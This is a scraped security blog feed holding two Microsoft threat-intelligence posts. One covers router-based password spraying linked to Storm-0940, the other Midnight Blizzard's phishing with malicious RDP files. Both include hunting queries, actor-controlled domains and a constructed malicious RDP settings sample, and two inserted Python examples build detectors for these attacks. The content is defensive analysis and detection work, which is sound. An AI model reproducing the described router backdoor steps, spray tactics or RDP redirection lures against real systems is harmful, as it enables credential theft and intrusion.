Attacker techniques, tools, and infrastructure | Latest Threats | Microsoft Security Blog
http://approjects.co.za/?big=en-us/security/blog/threat-intelligence/attacker-techniques-tools-and-infrastructure/
Expert coverage of cybersecurity topics. Feed last updated Fri, 08 Nov 2024 15:06:14 +0000.

Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network
http://approjects.co.za/?big=en-us/security/blog/2024/10/31/chinese-threat-actor-storm-0940-uses-credentials-from-password-spray-attacks-from-a-covert-network/
Thu, 31 Oct 2024 17:00:00 +0000

Since August 2023, Microsoft has observed intrusion activity targeting and successfully stealing credentials from multiple Microsoft customers that is enabled by highly evasive password spray attacks. Microsoft has linked the source of these password spray attacks to a network of compromised devices we track as CovertNetwork-1658, also known as xlogin and Quad7 (7777). Microsoft is publishing this blog on how covert networks are used in attacks, with the goal of increasing awareness, improving defenses, and disrupting related activity against our customers.

Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors. In particular, Microsoft has observed the Chinese threat actor Storm-0940 using credentials from CovertNetwork-1658. Active since at least 2021, Storm-0940 obtains initial access through password spray and brute-force attacks, or by exploiting or misusing network edge applications and services. Storm-0940 is known to target organizations in North America and Europe, including think tanks, government organizations, non-governmental organizations, law firms, defense industrial base, and others.

As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to help secure their environments. In this blog, we provide more information about CovertNetwork-1658 infrastructure, and associated Storm-0940 activity. We also share mitigation recommendations, detection information, and hunting queries that can help organizations identify, investigate, and mitigate associated activity.

What is CovertNetwork-1658?

Microsoft tracks a network of compromised small office and home office (SOHO) routers as CovertNetwork-1658. SOHO routers manufactured by TP-Link make up most of this network. Microsoft uses “CovertNetwork” to refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors.

CovertNetwork-1658 specifically refers to a collection of egress IPs that may be used by one or more Chinese threat actors and is wholly comprised of compromised devices. Microsoft assesses that a threat actor located in China established and maintains this network. The threat actor exploits a vulnerability in the routers to gain remote code execution capability. We continue to investigate the specific exploit by which this threat actor compromises these routers. Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Post-compromise activity on compromised routers

After successfully gaining access to a vulnerable router, in some instances, the following steps are taken by the threat actor to prepare the router for password spray operations:

  1. Download Telnet binary from a remote File Transfer Protocol (FTP) server
  2. Download xlogin backdoor binary from a remote FTP server
  3. Utilize the downloaded Telnet and xlogin binaries to start an access-controlled command shell on TCP port 7777
  4. Connect and authenticate to the xlogin backdoor listening on TCP port 7777
  5. Download a SOCKS5 server binary to router
  6. Start SOCKS5 server on TCP port 11288
Figure 1. Steps taken to prepare the router for password spray operations

CovertNetwork-1658 is observed conducting their password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructure

Microsoft has observed multiple password spray campaigns originating from CovertNetwork-1658 infrastructure. In these campaigns, CovertNetwork-1658 submits a very small number of sign-in attempts to many accounts at a target organization. In about 80 percent of cases, CovertNetwork-1658 makes only one sign-in attempt per account per day. Figure 2 depicts this distribution in greater detail.

Figure 2. CovertNetwork-1658 count of sign-in attempts per account per day.

CovertNetwork-1658 infrastructure is difficult to monitor due to the following characteristics:

  • The use of compromised SOHO IP addresses
  • The use of a rotating set of IP addresses at any given time. The threat actors had thousands of available IP addresses at their disposal. The average uptime for a CovertNetwork-1658 node is approximately 90 days.
  • The low-volume password spray process; for example, monitoring for multiple failed sign-in attempts from one IP address or to one account will not detect this activity
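As an added example (not Microsoft's code), the following Python re-implements the ISP-level aggregation of the post's "Failed sign-in activity" hunting query and runs it beside a classic per-IP / per-account threshold rule over constructed sign-in telemetry, to show why the per-source rule never fires on this pattern while the aggregation does. The field names mirror the IdentityLogonEvents columns; the ISP names, accounts and IP addresses are constructed.

```python
"""Low-and-slow password spray: per-source thresholds versus ISP aggregation.

Added example, not code from the Microsoft post. It re-implements the logic of
the post's 'Failed sign-in activity' hunting query in Python and runs it, next
to a classic per-IP / per-account threshold rule, over constructed telemetry.
Field names mirror the IdentityLogonEvents columns the query uses.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Fixed "now" for the constructed telemetry so results are reproducible.
SAMPLE_NOW = datetime(2024, 10, 30, 12, 0, 0)


@dataclass(frozen=True)
class LogonEvent:
    timestamp: datetime
    account_id: str   # AccountObjectId
    ip: str           # IPAddress
    country: str      # Location
    isp: str          # ISP
    action: str       # ActionType: "LogonFailed" or "LogonSuccess"


def per_source_detector(events: List[LogonEvent], threshold: int = 5) -> Dict[str, List[str]]:
    """Classic rule: alert when one IP or one account accumulates >= threshold
    failures. One attempt per account per day from thousands of rotating
    SOHO addresses never reaches such a threshold."""
    failed = [e for e in events if e.action == "LogonFailed"]
    by_ip = Counter(e.ip for e in failed)
    by_account = Counter(e.account_id for e in failed)
    return {
        "ips": sorted(ip for ip, n in by_ip.items() if n >= threshold),
        "accounts": sorted(a for a, n in by_account.items() if n >= threshold),
    }


def isp_aggregation_detector(events: List[LogonEvent], now: datetime,
                             window: timedelta = timedelta(hours=4),
                             min_accounts: int = 100, min_countries: int = 5,
                             min_ips: int = 25) -> Dict[str, Dict[str, int]]:
    """Python equivalent of the KQL: over the last `window`, summarize
    dcount(account), dcount(country), dcount(ip) by ISP, then require
    TargetCount >= 100, TargetCountry >= 5 and TargetIPAddress >= 25."""
    cutoff = now - window
    accounts, countries, ips = defaultdict(set), defaultdict(set), defaultdict(set)
    for e in events:
        if e.action != "LogonFailed" or e.timestamp <= cutoff or not e.account_id:
            continue
        accounts[e.isp].add(e.account_id)
        countries[e.isp].add(e.country)
        ips[e.isp].add(e.ip)
    hits = {}
    for isp in accounts:
        a, c, i = len(accounts[isp]), len(countries[isp]), len(ips[isp])
        if a >= min_accounts and c >= min_countries and i >= min_ips:
            hits[isp] = {"TargetCount": a, "TargetCountry": c, "TargetIPAddress": i}
    return hits


def build_sample_events(now: datetime, n_accounts: int = 120, n_nodes: int = 40) -> List[LogonEvent]:
    """Constructed telemetry (not real data): a spray giving each of 120
    accounts exactly one failed attempt, spread over 40 proxy nodes of one
    ISP in 7 countries, plus one legitimate user mistyping a password 6 times
    from a single corporate address before succeeding."""
    countries = ["US", "DE", "FR", "GB", "NL", "PL", "IT"]
    nodes = [(f"198.51.100.{n}", countries[n % len(countries)]) for n in range(1, n_nodes + 1)]
    events = []
    for k in range(n_accounts):
        ip, country = nodes[k % n_nodes]
        events.append(LogonEvent(now - timedelta(minutes=(k * 7) % 230 + 1),
                                 f"acct-{k:04d}", ip, country, "ExampleSOHO-ISP", "LogonFailed"))
    for m in range(6):
        events.append(LogonEvent(now - timedelta(minutes=10 + m), "acct-typo",
                                 "203.0.113.9", "US", "CorpNet-ISP", "LogonFailed"))
    events.append(LogonEvent(now - timedelta(minutes=5), "acct-typo",
                             "203.0.113.9", "US", "CorpNet-ISP", "LogonSuccess"))
    return events


if __name__ == "__main__":
    events = build_sample_events(SAMPLE_NOW)
    # The threshold rule flags only the legitimate typo user ...
    print("per-source rule:", per_source_detector(events))
    # ... while the ISP aggregation surfaces the spray and ignores the typo user.
    print("ISP aggregation:", isp_aggregation_detector(events, SAMPLE_NOW))
```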

Various security vendors have reported on CovertNetwork-1658 activities, including Sekoia (July 2024) and Team Cymru (August 2024). Microsoft assesses that after these blogs were published, use of the CovertNetwork-1658 network declined substantially. The chart below, based on Censys.IO data, shows a steady and steep decline in the use of CovertNetwork-1658’s original infrastructure since its activities were exposed in public reporting.

Figure 3. Chart showing the drop in CovertNetwork-1658’s available nodes between August 1, 2024 and October 29, 2024

Microsoft assesses that CovertNetwork-1658 has not stopped operations, as recent activity indicates, but is likely acquiring new infrastructure with fingerprints modified from those that have been publicly disclosed. An observed increase in recent activity may be early evidence supporting this assessment.

Figure 4. Chart showing number of Microsoft Azure tenants targeted by day between October 8, 2024 and October 30, 2024.

Historically, Microsoft has observed an average of 8,000 compromised devices actively engaged in the CovertNetwork-1658 network at any given time. On average, about 20 percent of these devices perform password spraying at any given time. Any threat actor using the CovertNetwork-1658 infrastructure could conduct password spraying campaigns at a larger scale and greatly increase the likelihood of successful credential compromise and initial access to multiple organizations in a short amount of time. This scale, combined with quick operational turnover of compromised credentials between CovertNetwork-1658 and Chinese threat actors, allows for the potential of account compromises across multiple sectors and geographic regions.

Below are User Agent Strings* observed in the password spray activity:

  • Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

*Note: We updated this list of User Agent Strings on November 4, 2024 to fix typos.

Observed activity tied to Storm-0940

Microsoft has observed numerous cases where Storm-0940 has gained initial access to target organizations using valid credentials obtained through CovertNetwork-1658’s password spray operations. In some instances, Storm-0940 was observed using compromised credentials that were obtained from CovertNetwork-1658 infrastructure on the same day. This quick operational hand-off of compromised credentials is evidence of a likely close working relationship between the operators of CovertNetwork-1658 and Storm-0940.

After successfully gaining access to a victim environment, in some instances, Storm-0940 has been observed:

  • Using scanning and credential dumping tools to move laterally within the network;
  • Attempting to access network devices and install proxy tools and remote access trojans (RATs) for persistence; and
  • Attempting to exfiltrate data.

Recommendations

Organizations can defend against password spraying by building credential hygiene and hardening cloud identities. Microsoft recommends the following mitigations to reduce the impact of this threat:

Detection details

Alerts with the following titles in the Security Center can indicate threat activity on your network:

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert can indicate associated threat activity:

  • Storm-0940 actor activity detected

Microsoft Defender XDR

The following alert might indicate threat activity related to this threat. Note, however, that this alert can also be triggered by unrelated threat activity.

  • Password spray attacks originating from single ISP

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

  • Password Spray
  • Unfamiliar Sign-in properties
  • Atypical travel
  • Suspicious behavior: Impossible travel activity

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity:

  • Suspicious Administrative Activity
  • Impossible travel activity

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Potential Storm-0940 activity

This query matches the user agent strings observed in this activity against AAD sign-in event attributes (application and resource IDs) to surface potential activity and guide investigation:

//Advanced Hunting Query
let suspAppRes = datatable(appId:string, resourceId:string)
[
    "1950a258-227b-4e31-a9cf-717495945fc2", "00000003-0000-0000-c000-000000000000"
];
let userAgents = datatable(userAgent:string)
[
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" //Low fidelity
];
AADSignInEventsBeta
| where Timestamp >=ago(30d)
| where ApplicationId in ((suspAppRes | project appId)) and ResourceId in ((suspAppRes | project resourceId)) and UserAgent in ((userAgents| project userAgent))

Failed sign-in activity

The following query identifies failed sign-in attempts from multiple sources that originate from a single ISP. Attackers distribute attacks across multiple IP addresses within a single service provider to evade detection.

IdentityLogonEvents
| where Timestamp > ago(4h)
| where ActionType == "LogonFailed"
| where isnotempty(AccountObjectId)
| summarize TargetCount = dcount(AccountObjectId), TargetCountry = dcount(Location), TargetIPAddress = dcount(IPAddress) by ISP
| where TargetCount >= 100
| where TargetCountry >= 5
| where TargetIPAddress >= 25

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Potential Storm-0940 activity

This query matches the user agent strings observed in this activity against AAD sign-in event attributes (application and resource IDs) to surface potential activity and guide investigation:

//sentinelquery
let suspAppRes = datatable(appId:string, resourceId:string)
[
    "1950a258-227b-4e31-a9cf-717495945fc2", "00000003-0000-0000-c000-000000000000"
];
let userAgents = datatable(userAgent:string)
[
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" //Low fidelity
];
SigninLogs
| where TimeGenerated >=ago(30d)
| where AppId in ((suspAppRes | project appId)) and ResourceIdentity in ((suspAppRes | project resourceId)) and UserAgent in ((userAgents| project userAgent))

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files
http://approjects.co.za/?big=en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
Tue, 29 Oct 2024 19:00:00 +0000

Since October 22, 2024, Microsoft Threat Intelligence has observed Russian threat actor Midnight Blizzard sending a series of highly targeted spear-phishing emails to individuals in government, academia, defense, non-governmental organizations, and other sectors. This activity is ongoing, and Microsoft will continue to investigate and provide updates as available. Based on our investigation of previous Midnight Blizzard spear-phishing campaigns, we assess that the goal of this operation is likely intelligence collection. Microsoft is releasing this blog to notify the public and disrupt this threat actor activity. This blog provides context on these external spear-phishing attempts, which are common attack techniques and do not represent any new compromise of Microsoft.

The spear-phishing emails in this campaign were sent to thousands of targets in over 100 organizations and contained a signed Remote Desktop Protocol (RDP) configuration file that connected to an actor-controlled server. In some of the lures, the actor attempted to add credibility to their malicious messages by impersonating Microsoft employees. The threat actor also referenced other cloud providers in the phishing lures.

While this campaign focuses on many of Midnight Blizzard’s usual targets, the use of a signed RDP configuration file to gain access to the targets’ devices represents a novel access vector for this actor. Overlapping activity has also been reported by the Government Computer Emergency Response Team of Ukraine (CERT-UA) under the designation UAC-0215 and also by Amazon.

Midnight Blizzard is a Russian threat actor attributed by the United States and United Kingdom governments to the Foreign Intelligence Service of the Russian Federation, also known as the SVR. This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs), and IT service providers, primarily in the United States and Europe. Its focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018. Its operations often involve compromise of valid accounts and, in some highly targeted cases, advanced techniques to compromise authentication mechanisms within an organization to expand access and evade detection.

Midnight Blizzard is consistent and persistent in its operational targeting, and its objectives rarely change. It uses diverse initial access methods, including spear phishing, stolen credentials, supply chain attacks, compromise of on-premises environments to laterally move to the cloud, and leveraging service providers’ trust chain to gain access to downstream customers. Midnight Blizzard is known to use the Active Directory Federation Service (AD FS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is identified by peer security vendors as APT29, UNC2452, and Cozy Bear.

As with any observed nation-state actor activity, Microsoft is in the process of directly notifying customers that have been targeted or compromised, providing them with the necessary information to secure their accounts. Strong anti-phishing measures will help to mitigate this threat. As part of our commitment to helping protect against cyber threats, we provide indicators of compromise (IOCs), hunting queries, detection details, and recommendations at the end of this post.

Spear-phishing campaign

On October 22, 2024, Microsoft identified a spear-phishing campaign in which Midnight Blizzard sent phishing emails to thousands of users in over 100 organizations. The emails were highly targeted, using social engineering lures relating to Microsoft, Amazon Web Services (AWS), and the concept of Zero Trust. The emails contained a Remote Desktop Protocol (RDP) configuration file signed with a LetsEncrypt certificate. RDP configuration (.RDP) files summarize automatic settings and resource mappings that are established when a successful connection to an RDP server occurs. These configurations extend features and resources of the local system to a remote server, controlled by the actor.

In this campaign, the malicious .RDP attachment contained several sensitive settings that would lead to significant information exposure. Once the target system was compromised, it connected to the actor-controlled server and bidirectionally mapped the targeted user’s local device’s resources to the server. Resources sent to the server may include, but are not limited to, all logical hard disks, clipboard contents, printers, connected peripheral devices, audio, and authentication features and facilities of the Windows operating system, including smart cards. This access could enable the threat actor to install malware on the target’s local drive(s) and mapped network share(s), particularly in AutoStart folders, or install additional tools such as remote access trojans (RATs) to maintain access when the RDP session is closed. The process of establishing an RDP connection to the actor-controlled system may also expose the credentials of the user signed in to the target system.

Figure 1. Malicious remote connection (the dialog box asking the user to allow the remote connection initiated by the threat actor)

RDP connection

When the target user opened the .RDP attachment, an RDP connection was established to an actor-controlled system. The configuration of the RDP connection then allowed the actor-controlled system to discover and use information about the target system, including:

  • Files and directories
  • Connected network drives
  • Connected peripherals, including smart cards, printers, and microphones
  • Web authentication using Windows Hello, passkeys, or security keys
  • Clipboard data
  • Point of Service (also known as Point of Sale or POS) devices
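As an added example (not the RDP file parser Microsoft mentions in its detections), the following Python triages an attached .rdp file and reports which of the resources listed above its settings would hand to the remote server, treating a signed file as no safer than an unsigned one. The setting names are the standard .rdp file keys; the sample files, host names and signature value are constructed placeholders.

```python
"""Triage an attached .RDP configuration file for resource redirection.

Added example, not the parser Microsoft mentions in the post. Setting names are the
standard .rdp keys (each line is name:type:value; type s = string, i = integer,
b = binary). The sample files and host names below are constructed, not real IOCs.
"""
import re
from typing import Dict, List, Tuple

LINE_RE = re.compile(r"^(?P<name>[^:]+):(?P<type>[sib]):(?P<value>.*)$")

# (setting, predicate on its parsed value, what it redirects to the remote server)
RISKY_SETTINGS = [
    ("drivestoredirect",   lambda v: v not in ("", None), "local drives (files and directories)"),
    ("redirectclipboard",  lambda v: v == 1,              "clipboard contents"),
    ("redirectprinters",   lambda v: v == 1,              "printers"),
    ("redirectsmartcards", lambda v: v == 1,              "smart cards"),
    ("redirectwebauthn",   lambda v: v == 1,              "Windows Hello, passkeys and security keys"),
    ("redirectposdevices", lambda v: v == 1,              "Point of Service devices"),
    ("redirectcomports",   lambda v: v == 1,              "serial (COM) port peripherals"),
    ("devicestoredirect",  lambda v: v not in ("", None), "plug-and-play devices"),
    ("audiocapturemode",   lambda v: v == 1,              "microphone audio"),
]


def parse_rdp(text: str) -> Dict[str, object]:
    """Parse .rdp text into {setting: value}. Integer settings are converted, a repeated
    setting keeps its last value, and a malformed line raises instead of being skipped
    so that a mangled attachment is never rated clean."""
    settings: Dict[str, object] = {}
    for lineno, raw in enumerate(text.lstrip("\ufeff").splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not name:type:value: {raw!r}")
        name, typ, value = m["name"].strip().lower(), m["type"], m["value"].strip()
        if typ == "i" and not re.fullmatch(r"-?\d+", value):
            raise ValueError(f"line {lineno}: non-integer value for {name}")
        settings[name] = int(value) if typ == "i" else value
    return settings


def assess_rdp(settings: Dict[str, object]) -> Dict[str, object]:
    """Target host, whether the file carries a signature, and the local resources exposed."""
    return {
        "target": str(settings.get("full address", "")),
        "signed": bool(settings.get("signature")),
        "exposures": [what for key, risky, what in RISKY_SETTINGS if risky(settings.get(key))],
    }


def triage(text: str, trusted_hosts=frozenset()) -> Tuple[str, List[str]]:
    """Gateway verdict for an .rdp attachment: 'malformed', 'suspicious' or 'clean'.
    Any redirection, or a target host outside trusted_hosts, is a reason to flag it."""
    try:
        report = assess_rdp(parse_rdp(text))
    except ValueError as exc:
        return "malformed", [str(exc)]
    target = report["target"] or "<no address>"
    reasons = [f"redirects {x} to {target}" for x in report["exposures"]]
    if report["target"].split(":")[0].lower() not in trusted_hosts:
        reasons.insert(0, f"connects to non-allowlisted host {target}")
    if report["signed"] and reasons:
        # The campaign's file was signed: a signature says who produced it, not that it is safe.
        reasons.append("file is signed, which does not make the redirections safe")
    return ("suspicious" if reasons else "clean"), reasons


# Constructed sample with the campaign's redirection profile (placeholder host and signature).
SUSPICIOUS_RDP = """\
full address:s:rdp-server.example.invalid
redirectclipboard:i:1
drivestoredirect:s:*
redirectprinters:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
redirectposdevices:i:1
audiocapturemode:i:1
devicestoredirect:s:*
redirectcomports:i:0
signature:s:PLACEHOLDER-SIGNATURE-BLOB
"""

# Constructed benign file: internal terminal server, no redirection.
BENIGN_RDP = """\
full address:s:ts01.corp.example:3389
redirectclipboard:i:0
drivestoredirect:s:
redirectsmartcards:i:0
"""

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_RDP), ("benign", BENIGN_RDP)):
        verdict, reasons = triage(text, trusted_hosts={"ts01.corp.example"})
        print(label, "->", verdict, *reasons, sep="\n  ")
```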

Targets

Microsoft has observed this campaign targeting governmental agencies, higher education, defense, and non-governmental organizations in dozens of countries, but particularly in the United Kingdom, Europe, Australia, and Japan. This target set is consistent with other Midnight Blizzard phishing campaigns.

Email infrastructure

Midnight Blizzard sent the phishing emails in this campaign using email addresses belonging to legitimate organizations that were gathered during previous compromises. The domains used are listed in the IOC section below.

Mitigations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

Strengthen endpoint security configuration

If you are using Microsoft Defender for Endpoint, take the following steps:

  • Ensure tamper protection is turned on in Microsoft Defender for Endpoint.
  • Turn on network protection in Microsoft Defender for Endpoint.
  • Turn on web protection.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume.
  • Microsoft Defender XDR customers can turn on the following attack surface reduction rules to help prevent common attack techniques used by threat actors.
    • Block executable content from email client and webmail
    • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Strengthen antivirus configuration

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections help block a majority of new and unknown variants.
  • Enable Microsoft Defender Antivirus scanning of downloaded files and attachments.
  • Enable Microsoft Defender Antivirus real-time protection.

Strengthen Microsoft Office 365 configuration

  • Turn on Safe Links and Safe Attachments for Office 365.
  • Enable Zero-hour auto purge (ZAP) in Office 365 to help quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Strengthen email security configuration

  • Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. For example, Microsoft Defender for Office 365 merges incident and alert management across email, devices, and identities, centralizing investigations for email-based threats. Organizations can also leverage web browsers that automatically identify and help block malicious websites, including those used in phishing activities.
  • If you are using Microsoft Defender for Office 365, configure it to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect an organization from malicious links used in phishing and other attacks.
  • If you are using Microsoft Defender for Office 365, use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing credentials.

Conduct user education

  • Robust user education can help mitigate the threat of social engineering and phishing emails. Companies should have a user education program that highlights how to identify and report suspicious emails.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Midnight Blizzard Actor activity group
  • Suspicious RDP session

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects at least some of the malicious .RDP files as the following signature:

  • Backdoor:Script/HustleCon.A

Microsoft Defender for Cloud

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Communication with suspicious domain identified by threat intelligence
  • Suspicious outgoing RDP network activity
  • Traffic detected from IP addresses recommended for blocking

Microsoft Defender for Office 365

Microsoft Defender for Office 365 raises alerts on this campaign using email- and attachment-based detections. Additionally, hunting signatures and an RDP file parser have been incorporated into detections to block similar campaigns in the future. Defenders can identify such activity in alert titles referencing RDP, for example, Trojan_RDP*.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide threat intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Hunting queries

Microsoft Defender XDR

Identify potential Midnight Blizzard targeted recipients

Surface potentially targeted email accounts within the environment where the email sender originated from a Midnight Blizzard-compromised domain related to the RDP activity.

EmailEvents
| where SenderFromDomain in~ ("sellar.co.uk", "townoflakelure.com", "totalconstruction.com.au", "swpartners.com.au", "cewalton.com")
| project SenderFromDomain, SenderFromAddress, RecipientEmailAddress, Subject, Timestamp

Surface potential targets of an RDP attachment phishing attempt

Surface emails that contain a Remote Desktop Protocol (RDP) file as an attachment. This may indicate that the recipient was targeted in an RDP attachment phishing attempt.

EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project SenderFromAddress, RecipientEmailAddress, Subject, Timestamp, FileName, FileType

Identify potential successfully targeted assets in an RDP attachment phishing attack

Surface devices that may have been targeted by an email with an RDP file attached, followed by an RDP connection attempt from the device to an external network. This combined activity may indicate that the device was successfully targeted in an RDP attachment phishing attack.

// Step 1: Identify emails with RDP attachments
let rdpEmails = EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project EmailTimestamp = Timestamp, RecipientEmailAddress, NetworkMessageId, SenderFromAddress;
// Step 2: Identify outbound RDP connections
let outboundRDPConnections = DeviceNetworkEvents
| where RemotePort == 3389
| where ActionType == "ConnectionAttempt"
| where RemoteIPType == "Public"
| project RDPConnectionTimestamp = Timestamp, DeviceId, InitiatingProcessAccountUpn, RemoteIP;
// Step 3: Correlate email and network events
rdpEmails
| join kind=inner (outboundRDPConnections) on $left.RecipientEmailAddress == $right.InitiatingProcessAccountUpn
| project EmailTimestamp, RecipientEmailAddress, SenderFromAddress, RDPConnectionTimestamp, DeviceId, RemoteIP

Threat actor RDP connection files attached to email

Surface users who may have received, as an email attachment, one of the RDP connection files observed in this Midnight Blizzard attack.

EmailAttachmentInfo
| where FileName in~ (
    "AWS IAM Compliance Check.rdp",
    "AWS IAM Configuration.rdp",
    "AWS IAM Quick Start.rdp",
    "AWS SDE Compliance Check.rdp",
    "AWS SDE Environment Check.rdp",
    "AWS Secure Data Exchange - Compliance Check.rdp",
    "AWS Secure Data Exchange Compliance.rdp",
    "Device Configuration Verification.rdp",
    "Device Security Requirements Check.rdp",
    "IAM Identity Center Access.rdp",
    "IAM Identity Center Application Access.rdp",
    "Zero Trust Architecture Configuration.rdp",
    "Zero Trust Security Environment Compliance Check.rdp",
    "ZTS Device Compatibility Test.rdp"
)
| project Timestamp, FileName, SHA256, RecipientEmailAddress, SenderDisplayName, SenderFromAddress

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Email sender domains

Domain                      Last seen
sellar[.]co.uk              October 23, 2024
townoflakelure[.]com        October 23, 2024
totalconstruction[.]com.au  October 23, 2024
swpartners[.]com.au         October 23, 2024
cewalton[.]com              October 23, 2024

RDP file names

  • AWS IAM Compliance Check.rdp
  • AWS IAM Configuration.rdp
  • AWS IAM Quick Start.rdp
  • AWS SDE Compliance Check.rdp
  • AWS SDE Environment Check.rdp
  • AWS Secure Data Exchange – Compliance Check.rdp
  • AWS Secure Data Exchange Compliance.rdp
  • Device Configuration Verification.rdp
  • Device Security Requirements Check.rdp
  • IAM Identity Center Access.rdp
  • IAM Identity Center Application Access.rdp
  • Zero Trust Architecture Configuration.rdp
  • Zero Trust Security Environment Compliance Check.rdp
  • ZTS Device Compatibility Test.rdp

RDP remote computer domains

ap-northeast-1-aws.s3-ua[.]cloud
ap-northeast-1-aws.ukrainesec[.]cloud
ca-central-1.gov-ua[.]cloud
ca-central-1.ua-gov[.]cloud
ca-west-1.aws-ukraine[.]cloud
ca-west-1.mfa-gov[.]cloud
ca-west-1.ukrtelecom[.]cloud
central-2-aws.ua-mil[.]cloud
central-2-aws.ua-sec[.]cloud
central-2-aws.ukrainesec[.]cloud
central-2-aws.ukrtelecom[.]cloud
eu-central-1.difesa-it[.]cloud
eu-central-1.mfa-gov[.]cloud
eu-central-1.mil-be[.]cloud
eu-central-1.mil-pl[.]cloud
eu-central-1.minbuza[.]cloud
eu-central-1.mindef-nl[.]cloud
eu-central-1.msz-pl[.]cloud
eu-central-1.quirinale[.]cloud
eu-central-1.regeringskansliet-se[.]cloud
eu-central-1.s3-be[.]cloud
eu-central-1.s3-esa[.]cloud
eu-central-1.s3-nato[.]cloud
eu-central-1.ua-gov[.]cloud
eu-central-1.ua-sec[.]cloud
eu-central-1.ukrtelecom[.]cloud
eu-central-1-aws.amazonsolutions[.]cloud
eu-central-1-aws.dep-no[.]cloud
eu-central-1-aws.gov-pl[.]cloud
eu-central-1-aws.gov-sk[.]cloud
eu-central-1-aws.gov-trust[.]cloud
eu-central-1-aws.mfa-gov[.]cloud
